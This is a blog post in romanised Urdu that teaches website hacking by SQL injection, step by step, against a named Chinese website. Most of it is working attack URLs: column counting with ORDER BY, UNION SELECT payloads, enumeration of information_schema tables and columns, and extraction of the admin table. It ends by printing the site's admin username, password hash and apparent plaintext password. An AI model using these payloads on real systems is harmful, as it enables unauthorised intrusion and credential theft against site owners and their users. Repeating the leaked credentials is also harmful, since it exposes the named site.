Salam From Master Zombiee
SQL INJECTION KAY ZARIYA WEBSITE HACK KARNAY Kay Liye Humain In Cheezoan Ki ZarOrat paray Gi
Requirements :-
1.Vulnerable Website. (Use Google to find Vulnerable Website Using Dorks)
2.Firefox with Hack bar add-on.
3.Fresh Mind to Understand it.
Ok Lets Start :)
Vulnerable website talash karian
Mainy ya vulner able website li hy
http://www.qhdsenbao.com/cp_look.php?id=42
Website kay Url Kay akhir main ' Ki Alamat lagain :http://www.qhdsenbao.com/cp_look.php?id=42'
Or Cheack kArain Kay ya Website Vulnerable hay ya nai Agar ya Website SQL Ka Error Day To Ya HaCk Ho Sakti Hay ,,aGar ya website Not Found Ka Error Day To nai
Ok Ya Website SQL Error Day Rahe Hy ,,,So is ko hack karty han
Ab Hum Nay is Kay db kay Column Maloom Karnay hain ..
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 10 -->No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 11--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 12--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 13--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 14--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 15--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 16--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 17--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 18--> No Error
http://www.qhdsenbao.com/cp_look.php?id=42 Order by 19--> Unknown colum Error
To is Website Kay 18 Columns Han ..Kiun Kay Order by 19 Par ya k Unknown colum Error Deta Hay
Hack Bar Main SQL Kay Tab Par Click Karain --> Union Select statement
Amount Of Columns Enter Karain Or Ok Kar dian
Ab Website URL Kay Akhir main '--' Or Id=42 Change it to Id=-42
http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Or Hack bar kay zariya Execute Karain Humain Vulnerable Columns Milain gay han
2,5,7,9, Ya Vulnerable Columns Hain In SAB Columns Main Malicious code Inject kar kay Admin Details nikal Saktay Han
Ok Ab Db Version Cheack Karain:
http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Ab Table Name Find karnay han
Same here Vulnerable Column,2, number Ko Replace karna hy "group_concat(table_name)'' Or URL Kay Akhir main from information_schema.tables where table_schema=database()--
Example:
http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,Group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--
Database() Ko Remove Kar kay wahan Table.....CX_USER Ka Charter paste Karain.... Go to Hack Bar ..SQL -->Mysql-->Mysqlchar()
Ya Popup Samanay Ay Ga yahan Jo Table Of User..Admin Etc Yahan Par Paste karian Or Ok Kardain
Ab Website KaY URL Main Is Trah Changing Karni hay
Replace "group_concat(table_name) with "group_concat(column_name)" and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name= Yahan Jo Cx_user mysqlchar Hay Paste Karain--
Example : http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,Group_concat(Column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM information_schema.columns WHERE table_name=CHAR(99, 120, 95, 117, 115, 101, 114)--
Now replace group_concat(column_name) with group_concat(User_name,0x2a,user_pwd) Or URL KAY End main From Jo Table Hum nay nikala Tha ... Cx_User....
Like This
http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,Group_concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM Cx_User
Ab Enter Karain
Username: Admin
Password:fca7268b02d718468be4858a1506fc55 (millikuvvetler)
Quick Video Guide
0 comments:
Post a Comment